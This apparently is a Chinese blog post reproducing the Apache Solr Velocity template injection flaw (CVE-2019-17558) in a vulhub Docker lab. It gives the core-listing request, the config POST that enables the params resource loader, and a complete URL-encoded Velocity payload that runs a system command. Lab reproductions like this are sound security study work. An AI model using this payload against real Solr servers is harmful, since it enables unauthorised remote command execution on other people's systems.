热门标签
热门文章
- 1Springboot整合Elasticsearch7.10.0 RestHighLevelClient_springbootelasticsearch7.10
- 2OpenHarmony实战STM32MP157开发板 “控制” Hi3861开发板 -- 上篇_stm32外设如何转移到hi3861
- 3Git commit 中的Change-Id是什么_git amend gerrit set change-id
- 4PTA 题目7-22 龟兔赛跑_7-22 龟兔赛炮pta
- 5【AIGC】BaiChuan7B开源大模型介绍、部署以及创建接口服务_baichuan-7b本地部署
- 6电脑使用adb实现模拟手机点击_adb 模拟点击
- 7Quartz详解和使用CommandLineRunner在项目启动时初始化定时任务_quartz的commandlinerunner
- 8在项目管理这行,这6个残忍真相,越早知道越好_pm考证路线 知乎
- 9【java】仿级联查询 | Java通过DSL字符串查询ES (es8 dsl java)_java dsl
- 10spring boot:servlet启动方式_servlet启动执行class
当前位置: article > 正文
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)_apache solr velocity 模版注入远程命令执行漏洞(cve-2019-17558)
作者:编程变革者 | 2024-02-04 13:01:07
赞
踩
apache solr velocity 模版注入远程命令执行漏洞(cve-2019-17558) 复现
声明
好好学习,天天向上
漏洞描述
Solr是Apache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。 2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,然后get访问接口导致服务器命令执行。
影响范围
5.0.0 到 8.3.1版本
复现过程
使用8.2.0
使用vulhub
cd /app/vulhub-20201028/solr/CVE-2019-17558
- 1
使用docker启动
docker-compose up -d
- 1
访问IP:8983
默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心:
http://192.168.239.129:8983/solr/admin/cores?indexInfo=false&wt=json
- 1
这里核心是demo
构造请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称(大家在模拟请求的时候,可以先抓个包重放后,再完全把请求内容替换)
POST /solr/demo/config HTTP/1.1
Host: 192.168.239.129:8983
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
之后,注入Velocity模板即可执行任意命令(自行替换里面的IP和命令,我这里用的whoami,命令无法执行会报500,所以遇到500错误别紧张换一些别的命令)
http://192.168.239.129:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
- 1
使用完后关闭镜像
docker-compose down
- 1
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
- 1
- 2
镜像查询(查到的第一列就是ID值)
docker ps -a
- 1
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
- 1
关闭镜像(每次用完后关闭)
docker-compose down
- 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/blog/article/detail/58679
推荐阅读
- 点击上方蓝色字体,选择“设为星标”回复"面试"获取更多惊喜八股文教给我,你们专心刷题和面试Hi,我是王知无,一个大数据领域的原创作者。放心关注我,获取更多行业的一手消息。在大数据领域,越来越多的企业拥抱开源软件,在这个背景下,我们针对数据调... [详细]
赞
踩
- article
【Flink实战系列】Lorg/apache/flink/kafka/shaded/org/apache/kafka/clients/consumer/ConsumerRecord;)Ljava/_serialize(ljava/lang/object;ljava/lang/long;)lorg/
本文主要是分享了一个jar包冲突异常,以及怎样一步步排查问题到最后的解决问题,其实这两个异常在平时是非常常见的,给大家提供一个排查的思路,如果遇到类似的问题,知道怎么去解决。httpshttpshttps。......_serialize(... [详细]赞
踩
- article
(Ljava/lang/Object;Ljava/lang/Long;)Lorg/apache/flink/kafka/shaded/org/apache/kafka/clients/producer
问题原因是kafka版本过低再项目中导入kafka-client包。_lorg/apache/flink/kafka/shaded/org/apache/kafka/clients/producer/producerreclorg/apac... [详细]赞
踩
- mvn产生一个flink项目框架flink版本1.5.4mvnarchetype:generate-DarchetypeCatalog=internal-DarchetypeGroupId=org.apache.flink-Darchety... [详细]
赞
踩
- article
flink 启动job时 提示Lorg/apache/flink/metrics/groups/OperatorMetricGroup_flink kafka getmetricgroup()lorg/apache/flink/metr
INITIALIZINGtoFAILEDwithfailurecause:java.lang.NoSuchMethodError:org.apache.flink.api.common.functions.RuntimeContext.ge... [详细]赞
踩
- 北京时间2023年10月29日,分布式事务开源项目Seata正式通过Apache基金会的投票决议,以全票通过的优秀表现正式成为Apache孵化器项目!17位社区大咖寄语,Seata进入Apache孵化器北京时间2023年10月29日,分布式... [详细]
赞
踩
- 此外,Spark提供了丰富的编程接口(如Scala、Java、Python和R),可以方便地进行开发和调试。因此,Spark成为了大数据处理和分析的首选工具之一。ResilientDistributedDatasets(RDDs):RDD是... [详细]
赞
踩
- 本来就想看看移动。。。看着看着就去看底层去了_unityvelocityunityvelocity最近跟着做了几个小Demo,2D游戏的移动大部分都是利用物理的刚体。首先得到设备的输入:floathorizontalInput=Input.... [详细]
赞
踩
- 本文由前同程数科运维经理陈庆介绍了如何基于ApacheAPISIX实现自动化运维平台。_apisix有wafapisix有waf项目背景2019年底,因为公司在业务研发的过程中,遇到了一些业务痛点,比如:公司的开发技术栈是Java相关的,而... [详细]
赞
踩
- 消息队列(MessageQueue)是一种异步通信机制,它将消息发送者和接收者解耦,从而提高了应用程序的性能、可扩展性和可靠性。在分布式系统中,消息队列经常被用于处理高并发、异步处理、应用解耦等场景。本篇回答将分析比较常见的六种消息队列:R... [详细]
赞
踩
- 本文分享了关于Kafka、RabbitMQ和ActiveMQ三个流行的异步通信消息队列,以及三者的区别。_apacheactivemqapacheactivemq本文分享了关于Kafka、RabbitMQ和ActiveMQ三个流行的异步通信... [详细]
赞
踩
- /***演示ApacheCuratorAPI*1、增删查改*2、ACL访问权限控制*3、注册watch事件的三个接口*/@RestControllerpublicclassCuratorClientApiText{privateLogger... [详细]
赞
踩
- 关于eclipse连接CentOS上的Zookeeper超时超时错误如图所示解决方案1.查看ip地址是否一致2.Zookeeper服务器是否启动3.查看Linux是否关闭防火墙连接成功效果如下图:超时错误如图所示解决方案1.查看ip地址是否... [详细]
赞
踩
- apacheZooKeeper命令行下命令使用。_zkcli.shzkcli.shZooKeeper命令行ZooKeeper客户端有C语言和Java两个版本。ZooKeeper的命令在/usr/lib/zookeeper/bin文件夹下。运... [详细]
赞
踩
- 我正在研究Junit测试文件,它加载SQL文件并将其加载到Oracle中:importjava.io.BufferedReader;importjava.io.File;importjava.io.FileReader;importjava... [详细]
赞
踩
- 自此我们完整从搭建Hadoop,hive、flink、Mysql、Doris及DorisOnIceberg的使用全部介绍完了,Doris朝着数据仓库和数据融合的架构演进,支持湖仓一体的联邦查询,给我们的开发带来更多的便利,更高效的开发,省去... [详细]
赞
踩
- 全文检索--Solr--Solr身份验证配置(给Solr启动身份验证、添加用户、删除用户)03、全文检索--Solr--Solr身份验证配置(给Solr启动身份验证、添加用户、删除用户)目录全文检索--Solr--Solr身份验证配置启用身... [详细]
赞
踩
- 文章目录一、ApacheSolr简介二、CVE-2017-12629简介三、漏洞复现3.1、使用postCommit3.2、使用newSearcher一、ApacheSolr简介Solr是基于Lucene的面向企业搜索的web应用,是一个独... [详细]
赞
踩
- 作者:櫰木。开源大数据集群部署(九)Ranger审计日志集成(solr)作者:櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_serv... [详细]
赞
踩
- 一.ApacheRanger简介Apacheranger是一个Hadoop集群权限框架,提供操作、监控、管理复杂的数据权限,它提供一个集中的管理机制,管理基于yarn的Hadoop生态圈的所有数据权限。ApacheRanger可以对Hado... [详细]
赞
踩
相关标签
